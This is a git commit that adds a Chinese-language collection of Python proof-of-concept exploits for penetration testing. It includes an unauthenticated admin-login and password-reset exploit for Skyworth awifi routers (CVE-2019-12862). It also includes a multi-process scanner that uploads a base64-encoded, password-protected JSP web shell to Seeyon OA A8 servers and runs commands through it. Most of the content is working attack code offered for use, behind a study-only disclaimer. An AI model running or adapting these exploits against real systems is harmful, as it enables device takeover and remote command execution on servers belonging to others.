upload

2025-06-20 09:50:19 +00:00 · 2019-07-24 11:51:29 +08:00 · 2019-07-24 11:51:29 +08:00 · 4ce755629e
commit 4ce755629e
parent e9eb0169b7
3 changed files with 205 additions and 0 deletions
--- a/README.md
+++ b/README.md
@ -0,0 +1,29 @@
+- [Penetration_Testing_POC_With_Python](#PenetrationTestingPOCWithPython)
+  - [IOT Device](#IOT-Device)
+  - [Web APP](#Web-APP)
+  - [Mobile APP](#Mobile-APP)
+  - [PC](#PC)
+  - [说明](#%E8%AF%B4%E6%98%8E)
+
+# Penetration_Testing_POC_With_Python
+搜集有关渗透测试中用python编写的POC、脚本
+
+## IOT Device
+
+- [天翼创维awifi路由器存在多处未授权访问漏洞](天翼创维awifi路由器存在多处未授权访问漏洞.md)
+
+## Web APP
+
+- [致远OA_A8_getshell_0day](致远OA_A8_getshell_0day.md)
+
+## Mobile APP
+
+- 1.xxx
+
+## PC
+
+- 1.xxx
+
+## 说明
+
+> 此项目所有文章、代码均来源于互联网，仅供学习参考使用，严禁用于任何非法行为！使用即代表你同意自负责任！
--- a/天翼创维awifi路由器存在多处未授权访问漏洞.md
+++ b/天翼创维awifi路由器存在多处未授权访问漏洞.md
@ -0,0 +1,68 @@
+### 漏洞简介  
+
+|漏洞名称|上报日期|漏洞发现者|产品首页|软件链接|版本|CVE编号|
+--------|--------|---------|--------|-------|----|------|
+|天翼创维awifi路由器存在多处未授权访问漏洞|2019-06-01|H4lo|[http://www.skyworth.com/](http://www.skyworth.com/)|[http://www.skyworth.com/](http://www.skyworth.com/)|Boa/0.94.14rc21|[CVE-2019-12862](http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12862)|
+
+### 漏洞详情PDF：[详情](POC_Details/1.天翼创维awifi路由器存在多处未授权访问漏洞.pdf)
+
+### POC实现代码如下：  
+
+``` python
+#coding: utf-8
+#__author__: H4lo
+import requests
+import sys
+
+
+payload = "authflag=1"
+UA = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.75 Safari/537.36"
+headers = {
+    "User-Agent": UA,
+    "Cookie": payload
+}
+
+def exp(ip):
+    info = """1. Login with no password\n2. Change administrator's password\n"""
+    print info
+    op = int(raw_input("Enter the options:"))
+    if op == 1:
+        url = "http://" + str(ip)+"/home.htm"
+        try:
+            res = requests.get(url,headers=headers,timeout=5)
+            if "title.htm" in res.text:
+                print "[+] The router is vulnerable"
+            else:
+                print "[-] The router is not vulnerable"
+        except Exception as e:
+            print str(e)
+            
+    elif(op == 2):
+        url = "http://" + str(ip) + "/boafrm/formAwifiSwitchSetup"
+        data = {
+            "olduserpass":"1",
+            "newpass":"123456",
+            "confirmnewpass":"123456",
+            "submit-url":"/password.htm"
+        }
+        try:
+            res = requests.post(url=url,headers=headers,data=data,timeout=5)
+            if "restartNow" in res.text:
+                print "[+] Password had be changed to 123456"
+            else:
+                print "[-] Some error!"
+        except Exception as e:
+            print str(e)
+            
+    else:
+        print "error options!"
+if __name__ == '__main__':
+    ip = sys.argv[1]
+    exp(ip)
+```
+
+---
+
+### POC截图效果如下：
+
+![POC运行截图](img/1.png)
--- a/致远OA_A8_getshell_0day.md
+++ b/致远OA_A8_getshell_0day.md
@ -0,0 +1,108 @@
+### 漏洞简介  
+
+|漏洞名称|上报日期|漏洞发现者|产品首页|软件链接|版本|CVE编号|
+--------|--------|---------|--------|-------|----|------|
+|seeyon_rce致远 OA A8 getshell_0day|2019-06-26|360-CERT|[http://www.skyworth.com/](http://www.seeyon.com/) | [http://www.seeyon.com/](http://www.seeyon.com/) | A8 V7.0 SP3/V6.1 SP2|[B6-2019-062601](https://cert.360.cn/warning/detail?id=d877451a4dbebd852d01e9730d762076)|  
+
+### POC实现代码如下：  
+
+```python
+# Wednesday, 26 June 2019
+# Author:nianhua
+# Blog:https://github.com/nian-hua/
+# python3 版本
+ 
+import re
+import requests
+import base64
+from multiprocessing import Pool, Manager
+ 
+def send_payload(url):
+ 
+    headers = {'Content-Type': 'application/x-www-form-urlencoded'}
+ 
+    payload = "REJTVEVQIFYzLjAgICAgIDM1NSAgICAgICAgICAgICAwICAgICAgICAgICAgICAgNjY2ICAgICAgICAgICAgIERCU1RFUD1PS01MbEtsVg0KT1BUSU9OPVMzV1lPU1dMQlNHcg0KY3VycmVudFVzZXJJZD16VUNUd2lnc3ppQ0FQTGVzdzRnc3c0b0V3VjY2DQpDUkVBVEVEQVRFPXdVZ2hQQjNzekIzWHdnNjYNClJFQ09SRElEPXFMU0d3NFNYekxlR3c0VjN3VXczelVvWHdpZDYNCm9yaWdpbmFsRmlsZUlkPXdWNjYNCm9yaWdpbmFsQ3JlYXRlRGF0ZT13VWdoUEIzc3pCM1h3ZzY2DQpGSUxFTkFNRT1xZlRkcWZUZHFmVGRWYXhKZUFKUUJSbDNkRXhReVlPZE5BbGZlYXhzZEdoaXlZbFRjQVRkTjFsaU40S1h3aVZHemZUMmRFZzYNCm5lZWRSZWFkRmlsZT15UldaZEFTNg0Kb3JpZ2luYWxDcmVhdGVEYXRlPXdMU0dQNG9FekxLQXo0PWl6PTY2DQo8JUAgcGFnZSBsYW5ndWFnZT0iamF2YSIgaW1wb3J0PSJqYXZhLnV0aWwuKixqYXZhLmlvLioiIHBhZ2VFbmNvZGluZz0iVVRGLTgiJT48JSFwdWJsaWMgc3RhdGljIFN0cmluZyBleGN1dGVDbWQoU3RyaW5nIGMpIHtTdHJpbmdCdWlsZGVyIGxpbmUgPSBuZXcgU3RyaW5nQnVpbGRlcigpO3RyeSB7UHJvY2VzcyBwcm8gPSBSdW50aW1lLmdldFJ1bnRpbWUoKS5leGVjKGMpO0J1ZmZlcmVkUmVhZGVyIGJ1ZiA9IG5ldyBCdWZmZXJlZFJlYWRlcihuZXcgSW5wdXRTdHJlYW1SZWFkZXIocHJvLmdldElucHV0U3RyZWFtKCkpKTtTdHJpbmcgdGVtcCA9IG51bGw7d2hpbGUgKCh0ZW1wID0gYnVmLnJlYWRMaW5lKCkpICE9IG51bGwpIHtsaW5lLmFwcGVuZCh0ZW1wKyJcbiIpO31idWYuY2xvc2UoKTt9IGNhdGNoIChFeGNlcHRpb24gZSkge2xpbmUuYXBwZW5kKGUuZ2V0TWVzc2FnZSgpKTt9cmV0dXJuIGxpbmUudG9TdHJpbmcoKTt9ICU+PCVpZigiYXNhc2QzMzQ0NSIuZXF1YWxzKHJlcXVlc3QuZ2V0UGFyYW1ldGVyKCJwd2QiKSkmJiEiIi5lcXVhbHMocmVxdWVzdC5nZXRQYXJhbWV0ZXIoImNtZCIpKSl7b3V0LnByaW50bG4oIjxwcmU+IitleGN1dGVDbWQocmVxdWVzdC5nZXRQYXJhbWV0ZXIoImNtZCIpKSArICI8L3ByZT4iKTt9ZWxzZXtvdXQucHJpbnRsbigiOi0pIik7fSU+NmU0ZjA0NWQ0Yjg1MDZiZjQ5MmFkYTdlMzM5MGQ3Y2U="
+ 
+    payload = base64.b64decode(payload)
+ 
+    try:
+ 
+        r = requests.post(url + '/seeyon/htmlofficeservlet', data=payload)
+ 
+        r = requests.get(
+            url + '/seeyon/test123456.jsp?pwd=asasd3344&cmd=cmd%20+/c+echo+wangming')
+ 
+        if "wangming" in r.text:
+ 
+            return url
+ 
+        else:
+ 
+            return 0
+ 
+    except:
+ 
+        return 0
+ 
+def remove_control_chars(s):
+    control_chars = ''.join(map(chr, list(range(0,32)) + list(range(127,160))))
+    
+    control_char_re = re.compile('[%s]' % re.escape(control_chars))
+ 
+    s = control_char_re.sub('', s)
+ 
+    if 'http' not in s:
+ 
+        s = 'http://' + s
+ 
+    return s
+ 
+def savePeopleInformation(url, queue):
+ 
+    newurl = send_payload(url)
+ 
+    if newurl != 0:
+ 
+        fw = open('loophole.txt', 'a')
+        fw.write(newurl + '\n')
+        fw.close()
+ 
+    queue.put(url)
+ 
+def main():
+ 
+    pool = Pool(10)
+ 
+    queue = Manager().Queue()
+ 
+    fr = open('url.txt', 'r')
+ 
+    lines = fr.readlines()
+ 
+    for i in lines:
+ 
+        url = remove_control_chars(i)
+ 
+        pool.apply_async(savePeopleInformation, args=(url, queue,))
+ 
+    allnum = len(lines)
+ 
+    num = 0
+ 
+    while True:
+ 
+        print(queue.get())
+ 
+        num += 1
+ 
+        if num >= allnum:
+ 
+            fr.close()
+ 
+            break
+ 
+if "__main__" == __name__:
+ 
+    main()
+```
+